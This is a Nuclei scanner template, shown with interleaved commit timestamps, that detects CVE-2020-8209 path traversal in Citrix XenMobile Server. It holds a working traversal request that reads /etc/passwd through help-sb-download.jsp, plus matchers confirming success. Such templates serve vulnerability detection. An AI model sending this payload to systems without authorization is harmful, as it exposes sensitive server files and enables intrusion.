2021-01-02 04:56:15 +00:00
id : CVE-2020-8209
2020-11-16 14:49:51 +00:00
info :
2022-06-28 15:03:36 +00:00
name : Citrix XenMobile Server - Local File Inclusion
2020-11-16 14:49:51 +00:00
author : dwisiswant0
severity : high
description : |
2022-06-28 15:03:36 +00:00
Citrix XenMobile Server 10.12 before RP2, Citrix XenMobile Server 10.11 before RP4, Citrix XenMobile Server 10.10 before RP6, and Citrix XenMobile Server before 10.9 RP5 are susceptible to local file inclusion vulnerabilities.
2021-08-18 11:29:20 +00:00
reference :
2020-11-16 14:49:51 +00:00
- https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/
2022-05-17 09:18:12 +00:00
- https://support.citrix.com/article/CTX277457
2022-06-28 15:03:36 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-8209
2022-07-02 12:12:07 +00:00
reference :
- https://support.citrix.com/article/CTX277457
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-8209
cwe-id : CWE-22
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:citrix:xenmobile_server:*:*:*:*:*:*:*:*
epss-score : 0.97245
2022-07-02 11:31:17 +00:00
tags : cve,cve2020,citrix,lfi,xenmobile
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2020-11-16 14:49:51 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-11-16 14:49:51 +00:00
- method : GET
path :
- "{{BaseURL}}/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd"
2022-07-02 11:31:17 +00:00
2020-11-16 14:49:51 +00:00
matchers-condition : and
matchers :
- type : regex
2022-07-02 11:31:17 +00:00
part : body
2020-11-16 14:49:51 +00:00
regex :
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2022-07-02 11:31:17 +00:00
2020-11-16 14:49:51 +00:00
- type : word
2022-07-02 11:31:17 +00:00
part : header
2020-11-16 14:49:51 +00:00
words :
- "fileDownload=true"
- "application/octet-stream"
- "attachment;"
condition : and
2022-06-28 15:03:36 +00:00
# Enhanced by mp on 2022/06/28